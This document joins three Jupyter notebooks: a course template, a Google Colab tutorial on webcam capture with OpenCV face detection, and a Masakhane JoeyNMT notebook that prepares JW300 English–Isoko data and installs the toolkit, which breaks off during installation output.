templates/template.ipynb | ###Markdown
Title Description goes here Prerequisites: None
###Code
# Code explaining things go here
# Use Cases: None
# Documentation Link: None
# Video Link: None
###Output
_____no_output_____
###Markdown
 Programar y Reprogramar Recursos para Docentes Date: 29 October 2021, 13:00 to 15:00 Sofía Martin, Ariel Ramos, Liliana Hurtado, Sebastián Flores This text is markdown. You can double-click to edit it, and press Alt-Enter to render it.
###Code
# This is Python code
print(u"Jelou \U0001F30E")
###Output
Jelou 🌎
|
webcam.ipynb | ###Markdown
Google Colab: Access Webcam for Images and VideoThis notebook will go through how to access and run code on images and video taken using your webcam. For the purposes of this tutorial we will be using OpenCV's Haar Cascade to do face detection on our webcam images and video.
###Code
# import dependencies
from IPython.display import display, Javascript, Image
from google.colab.output import eval_js
from base64 import b64decode, b64encode
import cv2
import numpy as np
import PIL
import io
import html
import time
###Output
_____no_output_____
###Markdown
Helper FunctionsBelow are a few helper functions to make converting between different image data types and formats easier.
###Code
# function to convert the JavaScript object into an OpenCV image
def js_to_image(js_reply):
"""
Params:
js_reply: JavaScript object containing image from webcam
Returns:
img: OpenCV BGR image
"""
# decode base64 image
image_bytes = b64decode(js_reply.split(',')[1])
# convert bytes to numpy array
jpg_as_np = np.frombuffer(image_bytes, dtype=np.uint8)
# decode numpy array into OpenCV BGR image
img = cv2.imdecode(jpg_as_np, flags=1)
return img
# function to convert OpenCV Rectangle bounding box image into base64 byte string to be overlayed on video stream
def bbox_to_bytes(bbox_array):
"""
Params:
bbox_array: Numpy array (pixels) containing rectangle to overlay on video stream.
Returns:
bytes: Base64 image byte string
"""
# convert array into PIL image
bbox_PIL = PIL.Image.fromarray(bbox_array, 'RGBA')
iobuf = io.BytesIO()
# format bbox into png for return
bbox_PIL.save(iobuf, format='png')
# format return string
bbox_bytes = 'data:image/png;base64,{}'.format((str(b64encode(iobuf.getvalue()), 'utf-8')))
return bbox_bytes
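# Minimal round-trip illustration (an added sanity check, not part of the original demo):
# a fully transparent 480x640 RGBA overlay converts to a base64 PNG data-URL string.
_demo_overlay = np.zeros([480, 640, 4], dtype=np.uint8)
_demo_bytes = bbox_to_bytes(_demo_overlay)
assert _demo_bytes.startswith('data:image/png;base64,')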
###Output
_____no_output_____
###Markdown
Haar Cascade ClassifierFor this tutorial we will run a simple object detection algorithm called Haar Cascade on our images and video fetched from our webcam. OpenCV has a pre-trained Haar Cascade face detection model.
###Code
# initialize the Haar Cascade face detection model
face_cascade = cv2.CascadeClassifier(cv2.samples.findFile(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml'))
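# Typical usage on a grayscale frame (illustrative; `gray_frame` is a hypothetical placeholder,
# the real frames are produced in the capture code below):
# faces = face_cascade.detectMultiScale(gray_frame, scaleFactor=1.3, minNeighbors=5)
# scaleFactor sets the image-pyramid step and minNeighbors trades precision against recall.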
###Output
_____no_output_____
###Markdown
Webcam ImagesRunning code on images taken from the webcam is fairly straightforward. We will utilize code within Google Colab's **Code Snippets**, which provide a variety of useful functions for various tasks.We will be using the code snippet for **Camera Capture** to utilize your computer's webcam.
###Code
def take_photo(filename='photo.jpg', quality=0.8):
js = Javascript('''
async function takePhoto(quality) {
const div = document.createElement('div');
const capture = document.createElement('button');
capture.textContent = 'Capture';
div.appendChild(capture);
const video = document.createElement('video');
video.style.display = 'block';
const stream = await navigator.mediaDevices.getUserMedia({video: true});
document.body.appendChild(div);
div.appendChild(video);
video.srcObject = stream;
await video.play();
// Resize the output to fit the video element.
google.colab.output.setIframeHeight(document.documentElement.scrollHeight, true);
// Wait for Capture to be clicked.
await new Promise((resolve) => capture.onclick = resolve);
const canvas = document.createElement('canvas');
canvas.width = video.videoWidth;
canvas.height = video.videoHeight;
canvas.getContext('2d').drawImage(video, 0, 0);
stream.getVideoTracks()[0].stop();
div.remove();
return canvas.toDataURL('image/jpeg', quality);
}
''')
display(js)
# get photo data
data = eval_js('takePhoto({})'.format(quality))
# get OpenCV format image
img = js_to_image(data)
# grayscale img
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
print(gray.shape)
# get face bounding box coordinates using Haar Cascade
faces = face_cascade.detectMultiScale(gray)
# draw face bounding box on image
for (x,y,w,h) in faces:
img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
# save image
cv2.imwrite(filename, img)
return filename
try:
filename = take_photo('photo.jpg')
print('Saved to {}'.format(filename))
# Show the image which was just taken.
display(Image(filename))
except Exception as err:
# Errors will be thrown if the user does not have a webcam or if they do not
# grant the page permission to access it.
print(str(err))
###Output
_____no_output_____
###Markdown
Webcam VideosRunning code on webcam video is a little more complex than on images. We need to start a video stream using our webcam as input. Then we run each frame through our program (face detection) and create an overlay image that contains the bounding box(es) of any detections. We then overlay the bounding box image back onto the next frame of our video stream.
###Code
# JavaScript to properly create our live video stream using our webcam as input
def video_stream():
js = Javascript('''
var video;
var div = null;
var stream;
var captureCanvas;
var imgElement;
var labelElement;
var pendingResolve = null;
var shutdown = false;
function removeDom() {
stream.getVideoTracks()[0].stop();
video.remove();
div.remove();
video = null;
div = null;
stream = null;
imgElement = null;
captureCanvas = null;
labelElement = null;
}
function onAnimationFrame() {
if (!shutdown) {
window.requestAnimationFrame(onAnimationFrame);
}
if (pendingResolve) {
var result = "";
if (!shutdown) {
captureCanvas.getContext('2d').drawImage(video, 0, 0, 640, 480);
result = captureCanvas.toDataURL('image/jpeg', 0.8)
}
var lp = pendingResolve;
pendingResolve = null;
lp(result);
}
}
async function createDom() {
if (div !== null) {
return stream;
}
div = document.createElement('div');
div.style.border = '2px solid black';
div.style.padding = '3px';
div.style.width = '100%';
div.style.maxWidth = '600px';
document.body.appendChild(div);
const modelOut = document.createElement('div');
modelOut.innerHTML = "<span>Status:</span>";
labelElement = document.createElement('span');
labelElement.innerText = 'No data';
labelElement.style.fontWeight = 'bold';
modelOut.appendChild(labelElement);
div.appendChild(modelOut);
video = document.createElement('video');
video.style.display = 'block';
video.width = div.clientWidth - 6;
video.setAttribute('playsinline', '');
video.onclick = () => { shutdown = true; };
stream = await navigator.mediaDevices.getUserMedia(
{video: { facingMode: "environment"}});
div.appendChild(video);
imgElement = document.createElement('img');
imgElement.style.position = 'absolute';
imgElement.style.zIndex = 1;
imgElement.onclick = () => { shutdown = true; };
div.appendChild(imgElement);
const instruction = document.createElement('div');
instruction.innerHTML =
'<span style="color: red; font-weight: bold;">' +
'When finished, click here or on the video to stop this demo</span>';
div.appendChild(instruction);
instruction.onclick = () => { shutdown = true; };
video.srcObject = stream;
await video.play();
captureCanvas = document.createElement('canvas');
captureCanvas.width = 640; //video.videoWidth;
captureCanvas.height = 480; //video.videoHeight;
window.requestAnimationFrame(onAnimationFrame);
return stream;
}
async function stream_frame(label, imgData) {
if (shutdown) {
removeDom();
shutdown = false;
return '';
}
var preCreate = Date.now();
stream = await createDom();
var preShow = Date.now();
if (label != "") {
labelElement.innerHTML = label;
}
if (imgData != "") {
var videoRect = video.getClientRects()[0];
imgElement.style.top = videoRect.top + "px";
imgElement.style.left = videoRect.left + "px";
imgElement.style.width = videoRect.width + "px";
imgElement.style.height = videoRect.height + "px";
imgElement.src = imgData;
}
var preCapture = Date.now();
var result = await new Promise(function(resolve, reject) {
pendingResolve = resolve;
});
shutdown = false;
return {'create': preShow - preCreate,
'show': preCapture - preShow,
'capture': Date.now() - preCapture,
'img': result};
}
''')
display(js)
def video_frame(label, bbox):
data = eval_js('stream_frame("{}", "{}")'.format(label, bbox))
return data
# start streaming video from webcam
video_stream()
# label for video
label_html = 'Capturing...'
# initialze bounding box to empty
bbox = ''
count = 0
while True:
js_reply = video_frame(label_html, bbox)
if not js_reply:
break
# convert JS response to OpenCV Image
img = js_to_image(js_reply["img"])
# create transparent overlay for bounding box
bbox_array = np.zeros([480,640,4], dtype=np.uint8)
# grayscale image for face detection
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# get face region coordinates
faces = face_cascade.detectMultiScale(gray)
# get face bounding box for overlay
for (x,y,w,h) in faces:
bbox_array = cv2.rectangle(bbox_array,(x,y),(x+w,y+h),(255,0,0),2)
bbox_array[:,:,3] = (bbox_array.max(axis = 2) > 0 ).astype(int) * 255
# convert overlay of bbox into bytes
bbox_bytes = bbox_to_bytes(bbox_array)
# update bbox so next frame gets new overlay
bbox = bbox_bytes
###Output
_____no_output_____ |
benchmarks/en-iso/jw300-baseline/English_to_Isoko_BPE_notebook.ipynb | ###Markdown
Masakhane - Machine Translation for African Languages (Using JoeyNMT) Note before beginning: - The idea is that you should be able to make minimal changes to this in order to get SOME result for your own translation corpus. - The tl;dr: Go to the **"TODO"** comments which will tell you what to update to get up and running - If you actually want to have a clue what you're doing, read the text and peek at the links - With 100 epochs, it should take around 7 hours to run in Google Colab - Once you've gotten a result for your language, please attach and email your notebook that generated it to [email protected] - If you care enough and get a chance, doing a brief background on your language would be amazing. See examples in [(Martinus, 2019)](https://arxiv.org/abs/1906.05685) Retrieve your data & make a parallel corpusIf you are wanting to use the JW300 data referenced on the Masakhane website or in our GitHub repo, you can use `opus-tools` to convert the data into a convenient format. `opus_read` from that package provides a convenient tool for reading the native aligned XML files and to convert them to TMX format. The tool can also be used to fetch relevant files from OPUS on the fly and to filter the data as necessary. [Read the documentation](https://pypi.org/project/opustools-pkg/) for more details.Once you have your corpus files in TMX format (an xml structure which will include the sentences in your target language and your source language in a single file), we recommend reading them into a pandas dataframe. Thankfully, Jade wrote a silly `tmx2dataframe` package which converts your tmx file to a pandas dataframe.
###Code
from google.colab import drive
drive.mount('/content/drive')
# TODO: Set your source and target languages. Keep in mind, these traditionally use language codes as found here:
# These will also become the suffix's of all vocab and corpus files used throughout
import os
source_language = "en"
target_language = "iso"
lc = False # If True, lowercase the data.
seed = 42 # Random seed for shuffling.
tag = "baseline" # Give a unique name to your folder - this is to ensure you don't rewrite any models you've already submitted
os.environ["src"] = source_language # Sets them in bash as well, since we often use bash scripts
os.environ["tgt"] = target_language
os.environ["tag"] = tag
# This will save it to a folder in our gdrive instead!
!mkdir -p "/content/drive/My Drive/masakhane/$src-$tgt-$tag"
os.environ["gdrive_path"] = "/content/drive/My Drive/masakhane/%s-%s-%s" % (source_language, target_language, tag)
!echo $gdrive_path
# Install opus-tools
! pip install opustools-pkg
# Downloading our corpus
! opus_read -d JW300 -s $src -t $tgt -wm moses -w jw300.$src jw300.$tgt -q
# extract the corpus file
! gunzip JW300_latest_xml_$src-$tgt.xml.gz
# Download the global test set.
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-any.en
# And the specific test set for this language pair.
os.environ["trg"] = target_language
os.environ["src"] = source_language
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-$trg.en
! mv test.en-$trg.en test.en
! wget https://raw.githubusercontent.com/juliakreutzer/masakhane/master/jw300_utils/test/test.en-$trg.$trg
! mv test.en-$trg.$trg test.$trg
# Read the test data to filter from train and dev splits.
# Store english portion in set for quick filtering checks.
en_test_sents = set()
filter_test_sents = "test.en-any.en"
j = 0
with open(filter_test_sents) as f:
for line in f:
en_test_sents.add(line.strip())
j += 1
print('Loaded {} global test sentences to filter from the training/dev data.'.format(j))
import pandas as pd
# TMX file to dataframe
source_file = 'jw300.' + source_language
target_file = 'jw300.' + target_language
source = []
target = []
skip_lines = [] # Collect the line numbers of the source portion to skip the same lines for the target portion.
with open(source_file) as f:
for i, line in enumerate(f):
# Skip sentences that are contained in the test set.
if line.strip() not in en_test_sents:
source.append(line.strip())
else:
skip_lines.append(i)
with open(target_file) as f:
for j, line in enumerate(f):
# Only add to corpus if corresponding source was not skipped.
if j not in skip_lines:
target.append(line.strip())
print('Loaded data and skipped {}/{} lines since contained in test set.'.format(len(skip_lines), i))
df = pd.DataFrame(zip(source, target), columns=['source_sentence', 'target_sentence'])
# if you get TypeError: data argument can't be an iterator is because of your zip version run this below
#df = pd.DataFrame(list(zip(source, target)), columns=['source_sentence', 'target_sentence'])
df.head(3)
###Output
Loaded data and skipped 5685/243487 lines since contained in test set.
###Markdown
Pre-processing and exportIt is generally a good idea to remove duplicate translations and conflicting translations from the corpus. In practice, these public corpora include some number of these that need to be cleaned.In addition we will split our data into dev/test/train and export to the filesystem.
###Code
# drop duplicate translations
df_pp = df.drop_duplicates()
# drop conflicting translations
# (this is optional and something that you might want to comment out
# depending on the size of your corpus)
df_pp.drop_duplicates(subset='source_sentence', inplace=True)
df_pp.drop_duplicates(subset='target_sentence', inplace=True)
# Shuffle the data to remove bias in dev set selection.
df_pp = df_pp.sample(frac=1, random_state=seed).reset_index(drop=True)
# Install fuzzy wuzzy to remove "almost duplicate" sentences in the
# test and training sets.
! pip install fuzzywuzzy
! pip install python-Levenshtein
import time
from fuzzywuzzy import process
import numpy as np
# reset the index of the training set after previous filtering
df_pp.reset_index(drop=False, inplace=True)
# Remove samples from the training data set if they "almost overlap" with the
# samples in the test set.
# Filtering function. Adjust pad to narrow down the candidate matches to
# within a certain length of characters of the given sample.
def fuzzfilter(sample, candidates, pad):
candidates = [x for x in candidates if len(x) <= len(sample)+pad and len(x) >= len(sample)-pad]
if len(candidates) > 0:
return process.extractOne(sample, candidates)[1]
else:
return np.nan
# NOTE - This might run slow depending on the size of your training set. We are
# printing some information to help you track how long it would take.
scores = []
start_time = time.time()
for idx, row in df_pp.iterrows():
scores.append(fuzzfilter(row['source_sentence'], list(en_test_sents), 5))
if idx % 1000 == 0:
hours, rem = divmod(time.time() - start_time, 3600)
minutes, seconds = divmod(rem, 60)
print("{:0>2}:{:0>2}:{:05.2f}".format(int(hours),int(minutes),seconds), "%0.2f percent complete" % (100.0*float(idx)/float(len(df_pp))))
# Filter out "almost overlapping samples"
df_pp['scores'] = scores
df_pp = df_pp[df_pp['scores'] < 95]
# This section does the split between train/dev for the parallel corpora then saves them as separate files
# We use 1000 dev test and the given test set.
import csv
# Do the split between dev/train and create parallel corpora
num_dev_patterns = 1000
# Optional: lower case the corpora - this will make it easier to generalize, but without proper casing.
if lc: # Julia: making lowercasing optional
df_pp["source_sentence"] = df_pp["source_sentence"].str.lower()
df_pp["target_sentence"] = df_pp["target_sentence"].str.lower()
# Julia: test sets are already generated
dev = df_pp.tail(num_dev_patterns) # Herman: Error in original
stripped = df_pp.drop(df_pp.tail(num_dev_patterns).index)
with open("train."+source_language, "w") as src_file, open("train."+target_language, "w") as trg_file:
for index, row in stripped.iterrows():
src_file.write(row["source_sentence"]+"\n")
trg_file.write(row["target_sentence"]+"\n")
with open("dev."+source_language, "w") as src_file, open("dev."+target_language, "w") as trg_file:
for index, row in dev.iterrows():
src_file.write(row["source_sentence"]+"\n")
trg_file.write(row["target_sentence"]+"\n")
#stripped[["source_sentence"]].to_csv("train."+source_language, header=False, index=False) # Herman: Added `header=False` everywhere
#stripped[["target_sentence"]].to_csv("train."+target_language, header=False, index=False) # Julia: Problematic handling of quotation marks.
#dev[["source_sentence"]].to_csv("dev."+source_language, header=False, index=False)
#dev[["target_sentence"]].to_csv("dev."+target_language, header=False, index=False)
# Doublecheck the format below. There should be no extra quotation marks or weird characters.
! head train.*
! head dev.*
###Output
==> train.en <==
Now in his 80 ’ s , John admits that at times he feels despondent .
The Bible exhorts us to “ speak consolingly to the depressed souls , support the weak . ”
Those words of 17th - century British historian Edward Herbert underscore one reason why we need to be forgiving toward others : Sooner or later , we may need to ask others to forgive us .
So why not prove to yourself that what you have been taught from the Bible is indeed the truth ?
Father , glorify your name . ’
God’s Word foretold this development , saying : “ There will be a period of time when they [ people professing to serve God ] will not put up with the healthful teaching , but , in accord with their own desires , they will accumulate teachers for themselves to have their ears tickled . ”
We get water from a well at the police station .
Do we courageously identify ourselves as Jehovah’s Witnesses , even though doing so may mean persecution ?
Tatiana , a full - time evangelizer in Kamchatka , a Russian peninsula located northeast of Japan , began saving for the trip a year in advance .
Since 1939 , the cover of each issue of The Watchtower magazine has displayed the words “ Announcing Jehovah’s Kingdom . ”
==> train.iso <==
Enẹna Jọn ọ kpako te ikpe udhone gbọ no , ọ ta nọ ẹsejọ ọ be hai wo elọhoma .
Ebaibol na e ta udu họ omai awọ nnọ “ wha ta udu họ enọ udu u re bro awọ , wha fiobọhọ kẹ enọ e ko . ”
Eme yena nọ ogbiku yena ọ ta anwọ ikpe udhusoi akwa ane ( 400 ) nọ i kpemu na , i dhesẹ epanọ u wuzou te re ma rọ vrẹ amọfa , keme ma te siọ amọfa ba eruthọ ẹdẹjọ họ , nọ o te gwọlọ nọ a rọ vrẹ omai .
Kiẹ kẹ oma ra re u mu owhẹ ẹro inọ eware nọ a wuhrẹ owhẹ no Ebaibol ze na ginọ uzẹme .
Koyehọ uru jọ u te no eva ehru ze nọ , ‘ Mẹ kẹ riẹ oro uno , mẹ jẹ te wariẹ kẹ e oro . ’
A jọ Ebaibol ruẹaro kpahe onana , inọ : “ Oke o be tha nọ ahwo [ enọ i se oma rai eg’Ọghẹnẹ ] a rẹ te rehọ uwuhrẹ nọ o gbunu hu , [ rekọ ] ezọ e rẹ te sae okpọ a ve ti koko iwuhrẹ nọ i re ti wuhrẹ ai onọ a guọlọ . ”
Ozae nọ o rrọ ogba iporisi ma re kpohọ jo vo ame .
Kọ ma be hae gbaudu dhesẹ oma wọhọ Isẹri Jihova , o tẹ make rọnọ ere oruo o rẹ sae wha ukpokpoma ze ?
Tatiana , ọtausiuwoma oke - kpobi nọ o no Kamchatka ze , ẹwho Russia jọ nọ ọ rrọ ofẹ obọze ẹkpẹlobọ ovatha - ọre ọrọ Japan , o muọ ugho họ ekoko họ kẹ erẹ na ukpe soso taure oke na u te ti te .
Anwọ ukpe 1939 ze , uzoẹme nọ o rrọ uke emagazini Uwou - Eroro Na họ “ Uwou - Eroro Na Nọ U Bi Whowho Uvie Jihova . ”
==> dev.en <==
We can even ask God to ‘ create in us a pure heart . ’
This was followed by Kingdom News No .
In effect , all of us will then joyfully add our voices to the concluding portion of this beautiful and heartwarming song : “ Let his name [ that of the King Jesus Christ ] prove to be to time indefinite ; before the sun let his name have increase , and by means of him let them bless themselves ; let all nations pronounce him happy .
Still , words of apology are a strong force toward making peace .
Elijah brings the boy down to his mother and says : “ See , your son is alive . ”
By means of his ministry , he gave a priceless gift to humankind — a message that revealed the truth about God and His will .
Comparably , Christian husbands assign their mates honor and praise them .
How do we feel about all those who are making sacrifices for the Kingdom , and what should all of us consider ?
Jesus too is a shepherd and a conquering king .
These examples clearly establish that those who truly belong to Jehovah must firmly take their stand for righteousness and against wickedness .
==> dev.iso <==
Ma rẹ sae tubẹ yare Ọghẹnẹ re ọ ‘ kẹ omai eva efuafo . ’
U no ere no , a te siobọno obe usi ofa , Kingdom News No .
Mai kpobi ma te rọ oghọghọ ku irru mai gbe so abọ urere ọrọ ole omosasọ nana : “ Jọ odẹ riẹ [ ọrọ Jesu Kristi Ovie na ] o te jọ bẹdẹ bẹdẹ , re usi riẹ u ti do bẹse nọ akpọ ọ bẹoviẹ !
Ghele na , eme unu - uwou u re fi obọ họ gaga evaọ eruo udhedhẹ .
Elaeja ọ tẹ rehọ ọmọ na se oni riẹ jẹ ta nọ : “ Ri , ọmọ ra ọ zọe ” no .
Ọ rehọ ẹkwoma odibọgba riẹ kẹ ahwo - akpọ okẹ jọ nọ o ghare thesiwa — ovuẹ nọ u dhesẹ uzẹme na via kpahe Ọghẹnẹ gbe oreva riẹ .
Epọvo na re , ezae Ileleikristi a re tete eyae rai je jiri ai .
Ẹvẹ u fo nọ ma re rri inievo nọ i bi si obọ no eware jọ re a sae rọ iruo Uvie na karo , kọ eme u fo nọ mai omomọvo o re ru ?
Jesu omariẹ yọ othuru - igodẹ gbe ovie nọ o bi fi kparobọ .
Iriruo nana i dhesẹ vevẹ nọ enọ e ginẹ rrọ erọ Jihova a rẹ gbaemu nọ a re ru eware nọ i dhesẹ nọ a kiẹrẹe je mukpahe oware uyoma .
###Markdown
--- Installation of JoeyNMTJoeyNMT is a simple, minimalist NMT package which is useful for learning and teaching. Check out the documentation for JoeyNMT [here](https://joeynmt.readthedocs.io)
###Code
# Install JoeyNMT
! git clone https://github.com/joeynmt/joeynmt.git
! cd joeynmt; pip3 install .
###Output
Cloning into 'joeynmt'...
remote: Enumerating objects: 20, done.[K
remote: Counting objects: 100% (20/20), done.[K
remote: Compressing objects: 100% (17/17), done.[K
remote: Total 2204 (delta 8), reused 5 (delta 3), pack-reused 2184[K
Receiving objects: 100% (2204/2204), 2.60 MiB | 16.26 MiB/s, done.
Resolving deltas: 100% (1529/1529), done.
Processing /content/joeynmt
Requirement already satisfied: future in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.16.0)
Requirement already satisfied: pillow in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (6.2.2)
Requirement already satisfied: numpy<2.0,>=1.14.5 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.17.5)
Requirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (42.0.2)
Requirement already satisfied: torch>=1.1 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.3.1)
Requirement already satisfied: tensorflow>=1.14 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: torchtext in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.3.1)
Collecting sacrebleu>=1.3.6
Downloading https://files.pythonhosted.org/packages/45/31/1a135b964c169984b27fb2f7a50280fa7f8e6d9d404d8a9e596180487fd1/sacrebleu-1.4.3-py3-none-any.whl
Collecting subword-nmt
Downloading https://files.pythonhosted.org/packages/74/60/6600a7bc09e7ab38bc53a48a20d8cae49b837f93f5842a41fe513a694912/subword_nmt-0.3.7-py2.py3-none-any.whl
Requirement already satisfied: matplotlib in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (3.1.2)
Requirement already satisfied: seaborn in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.9.0)
Collecting pyyaml>=5.1
[?25l Downloading https://files.pythonhosted.org/packages/3d/d9/ea9816aea31beeadccd03f1f8b625ecf8f645bd66744484d162d84803ce5/PyYAML-5.3.tar.gz (268kB)
[K |████████████████████████████████| 276kB 8.2MB/s
[?25hCollecting pylint
[?25l Downloading https://files.pythonhosted.org/packages/e9/59/43fc36c5ee316bb9aeb7cf5329cdbdca89e5749c34d5602753827c0aa2dc/pylint-2.4.4-py3-none-any.whl (302kB)
[K |████████████████████████████████| 307kB 9.7MB/s
[?25hRequirement already satisfied: six==1.12 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.12.0)
Requirement already satisfied: opt-einsum>=2.3.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (3.1.0)
Requirement already satisfied: tensorflow-estimator==1.15.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.1)
Requirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.11.2)
Requirement already satisfied: tensorboard<1.16.0,>=1.15.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (3.10.0)
Requirement already satisfied: keras-applications>=1.0.8 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.0.8)
Requirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.33.6)
Requirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.8.1)
Requirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: gast==0.2.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.2.2)
Requirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.1.8)
Requirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.9.0)
Requirement already satisfied: tqdm in /usr/local/lib/python3.6/dist-packages (from torchtext->joeynmt==0.0.1) (4.28.1)
Requirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from torchtext->joeynmt==0.0.1) (2.21.0)
Collecting portalocker
Downloading https://files.pythonhosted.org/packages/91/db/7bc703c0760df726839e0699b7f78a4d8217fdc9c7fcb1b51b39c5a22a4e/portalocker-1.5.2-py2.py3-none-any.whl
Requirement already satisfied: typing in /usr/local/lib/python3.6/dist-packages (from sacrebleu>=1.3.6->joeynmt==0.0.1) (3.6.6)
Requirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (0.10.0)
Requirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (2.4.6)
Requirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (2.6.1)
Requirement already satisfied: scipy>=0.14.0 in /usr/local/lib/python3.6/dist-packages (from seaborn->joeynmt==0.0.1) (1.4.1)
Requirement already satisfied: pandas>=0.15.2 in /usr/local/lib/python3.6/dist-packages (from seaborn->joeynmt==0.0.1) (0.25.3)
Collecting mccabe<0.7,>=0.6
Downloading https://files.pythonhosted.org/packages/87/89/479dc97e18549e21354893e4ee4ef36db1d237534982482c3681ee6e7b57/mccabe-0.6.1-py2.py3-none-any.whl
Collecting astroid<2.4,>=2.3.0
[?25l Downloading https://files.pythonhosted.org/packages/ad/ae/86734823047962e7b8c8529186a1ac4a7ca19aaf1aa0c7713c022ef593fd/astroid-2.3.3-py3-none-any.whl (205kB)
[K |████████████████████████████████| 215kB 19.9MB/s
[?25hCollecting isort<5,>=4.2.5
[?25l Downloading https://files.pythonhosted.org/packages/e5/b0/c121fd1fa3419ea9bfd55c7f9c4fedfec5143208d8c7ad3ce3db6c623c21/isort-4.3.21-py2.py3-none-any.whl (42kB)
[K |████████████████████████████████| 51kB 9.1MB/s
[?25hRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow>=1.14->joeynmt==0.0.1) (0.16.0)
Requirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow>=1.14->joeynmt==0.0.1) (3.1.1)
Requirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.8->tensorflow>=1.14->joeynmt==0.0.1) (2.8.0)
Requirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (1.24.3)
Requirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (3.0.4)
Requirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (2.8)
Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (2019.11.28)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.15.2->seaborn->joeynmt==0.0.1) (2018.9)
Collecting lazy-object-proxy==1.4.*
[?25l Downloading https://files.pythonhosted.org/packages/0b/dd/b1e3407e9e6913cf178e506cd0dee818e58694d9a5cd1984e3f6a8b9a10f/lazy_object_proxy-1.4.3-cp36-cp36m-manylinux1_x86_64.whl (55kB)
[K |████████████████████████████████| 61kB 9.3MB/s
[?25hCollecting typed-ast<1.5,>=1.4.0; implementation_name == "cpython" and python_version < "3.8"
[?25l Downloading https://files.pythonhosted.org/packages/90/ed/5459080d95eb87a02fe860d447197be63b6e2b5e9ff73c2b0a85622994f4/typed_ast-1.4.1-cp36-cp36m-manylinux1_x86_64.whl (737kB)
[K |████████████████████████████████| 747kB 19.9MB/s
[?25hBuilding wheels for collected packages: joeynmt, pyyaml
Building wheel for joeynmt (setup.py) ... [?25l[?25hdone
Created wheel for joeynmt: filename=joeynmt-0.0.1-cp36-none-any.whl size=72136 sha256=bbe4d9c5390f6074d9a813a1690ae719d37cd77bbc8e1865105668a1862dac9a
Stored in directory: /tmp/pip-ephem-wheel-cache-1h4i3ayp/wheels/db/01/db/751cc9f3e7f6faec127c43644ba250a3ea7ad200594aeda70a
Building wheel for pyyaml (setup.py) ... [?25l[?25hdone
Created wheel for pyyaml: filename=PyYAML-5.3-cp36-cp36m-linux_x86_64.whl size=44229 sha256=36c938900abf13262c7d1bab10af4ffe976a172a0b9de62ad4a123c307bb7417
